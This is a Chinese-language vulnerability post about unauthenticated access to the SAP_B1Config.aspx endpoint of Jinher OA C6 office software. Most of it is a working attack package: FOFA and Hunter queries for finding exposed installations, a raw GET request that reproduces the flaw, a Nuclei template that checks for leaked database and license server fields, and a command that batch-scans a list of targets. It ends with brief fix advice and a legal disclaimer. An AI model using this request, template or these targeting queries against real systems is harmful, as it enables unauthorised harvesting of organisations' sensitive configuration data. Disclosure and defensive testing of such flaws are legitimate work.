【产品介绍】
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。
【漏洞介绍】
金和OA sap-b1config-aspx接口存在未授权,攻击者可通过此漏洞获取敏感信息。
【资产测绘Query】
Fofa语法:app=”金和网络-金和OA”
Hunter语法:app.name=”金和 OA”
【产品界面】
【漏洞复现】
GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
【Nuclei-Poc】
id: jinher-oa-c6-jhsoft-sapb1config-unauth
info:
name: jinher-oa-c6-jhsoft-sapb1config-unauth
author: jinher-oa-c6-jhsoft-sapb1config-unauth
severity: high
http:
- raw:
- |
GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"txtLicenseServer","txtDatabaseServer")
【验证】
.\nuclei -l 1.txt -t 4.yaml
【修复建议】
1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
